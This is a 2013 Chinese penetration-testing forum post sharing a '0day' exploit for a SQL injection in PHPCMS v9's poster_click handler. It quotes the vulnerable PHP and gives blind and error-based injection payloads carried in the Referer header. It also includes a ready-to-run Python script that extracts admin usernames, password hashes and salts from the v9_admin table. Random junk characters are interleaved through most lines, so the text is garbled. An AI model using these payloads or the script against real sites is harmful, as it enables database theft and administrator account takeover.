中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
7 c7 E/ e) t- Y5 }
% p% u# A1 r' A; I问题函数\phpcms\modules\poster\index.php
# W6 r0 I; j8 p4 ^. a; r. E
& s9 P5 k" a8 \: t% dpublic function poster_click() {
" p" J, _  z" |' d( Y8 W# f0 _$ U$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$ A- Z8 [* U% j7 x8 d$r = $this->db->get_one(array('id'=>$id));  I. D4 }' W/ W+ {, z
if (!is_array($r) && empty($r)) return false;
/ b1 W( u3 p  W. a5 i) K$ k$ip_area = pc_base::load_sys_class('ip_area');
4 A3 \5 k  g2 u7 r+ O$ip = ip();( H9 Q! a: S# H  N9 v7 h) h4 }
$area = $ip_area->get($ip);* d+ D1 V/ [' f
$username = param::get_cookie('username') ? param::get_cookie('username') : '';0 }. G/ c$ Q1 r3 C$ V6 l
if($id) {
) G% H! N$ h! _% D8 z$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();' o$ H. ]0 o$ y4 K( S; }' A5 [
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));4 C0 d5 {0 i' s3 }% O/ m, Y* O4 F& Q
}: e6 g0 Y  n2 S6 S$ N2 s3 H
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));3 i& Z' T. j  A% N1 I% W* n
$setting = string2array($r['setting']);9 T# a' b% E2 O
if (count($setting)==1) {
7 h% ?6 u- V/ _  R$ j9 f2 o$url = $setting['1']['linkurl'];
: f& z) a6 |2 k5 T# s  _; W/ q# M} else {! O$ G, r2 Q: Y
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];2 H$ _# Q' Y9 |0 c
}
: F0 G7 Q& W& \) h( A4 Theader('Location: '.$url);& J6 H1 q) M( R) Q
}; d: H5 R5 {. j, o" j) E
5 Z' [4 _; Z# s4 d) f

8 Q$ c" n+ P% w- |
  ?- ~# R4 W. X. H1 H利用方式:
- g8 R$ |$ V2 H, ^# S$ X1 J5 e7 S6 P$ v; J0 u
1、可以采用盲注入的手法:5 G4 x5 |7 ^. z3 H5 n; z  ]" f* |! D
  _. p) o7 l2 t! W! X3 x! L
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#) Y. g6 _, d* x. W* }
9 I, l" h) I6 |; t9 A
通过返回页面,正常与否一个个猜解密码字段。
; i6 L6 z: a6 I+ [  q* S$ u5 H: u, u( d! _+ a4 Q
2、代码是花开写的,随手附上了:
4 v" f0 V2 y  p$ ^4 i' M/ {" n8 b
( r4 o, S0 I8 C% ^- }% f: ~1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 `, x7 u: X2 ~, o* K

  g, b$ ~! L+ B+ k此方法是爆错注入手法,原理自查。
! h+ r7 S" ~8 _. [, {2 ]2 Y0 F5 G; q( {, p3 D, |8 I9 n

: f, Y- c/ r7 V1 C
. k( ^3 }$ C# Q+ g6 t利用程序:. A# o$ C8 C5 z5 f9 _. q; [

8 d2 K, m: L9 ^' m#!/usr/bin/env python/ f2 z; K) M( ?  ~9 D8 X1 d
import httplib,sys,re; V. U. L! F; N# u0 {. {: G& p

3 N) v* k) K; _8 l- H, B: u0 k: Qdef attack():
! e" w4 ^. p" y9 H4 @8 bprint “Code by Pax.Mac Team conqu3r!”5 O6 y; m% T7 U# H
print “Welcome to our zone!!!”
2 ]" @9 r8 u7 t' T( V  Durl=sys.argv[1]
( p7 x' B& ], n/ rpaths=sys.argv[2]' n6 R7 F% y3 m) `: {
conn = httplib.HTTPConnection(url)( r' R, F, J' b
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
) m" r! `$ d4 A! p0 }, E! L“Accept”: “text/plain”,
+ [8 c( o* S3 k, c: C8 x% m“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
! T7 A( C: \* T# N, z6 f5 a6 R) _conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)) W. A" V( k9 \5 E
r1 = conn.getresponse()
7 l2 H- F- ?3 h& Ddatas=r1.read()5 h$ v8 E4 [% M
datas=re.findall(r”Duplicate entry \’\w+’”, datas)9 x: h! A1 c8 B3 r
print datas[0]" g; l% B+ j5 }0 n
conn.close()
8 k' r. Y2 V) z: s$ Aif __name__==”__main__”:- z: o2 Z" j8 t& c2 V
if len(sys.argv)<3:( p9 S" i3 u( M; e( p
print “Code by Pax.Mac Team conqu3r”
0 I+ q5 D+ v6 A# G* H2 sprint “Usgae:”
2 m$ T+ m5 w3 ]+ u, Zprint “    phpcmsattack.py   www.paxmac.org /”2 V" g# D: T+ t) r- t
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
% K. y1 ^2 h% S! D1 usys.exit(1)
( E+ l* p: Z+ F- Y# P. E6 |attack()$ M/ u+ y4 ?' D6 C8 P$ F* z3 M' B. e

) ^! N: V2 D/ y0 ]1 z4 k) Y# u. o




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2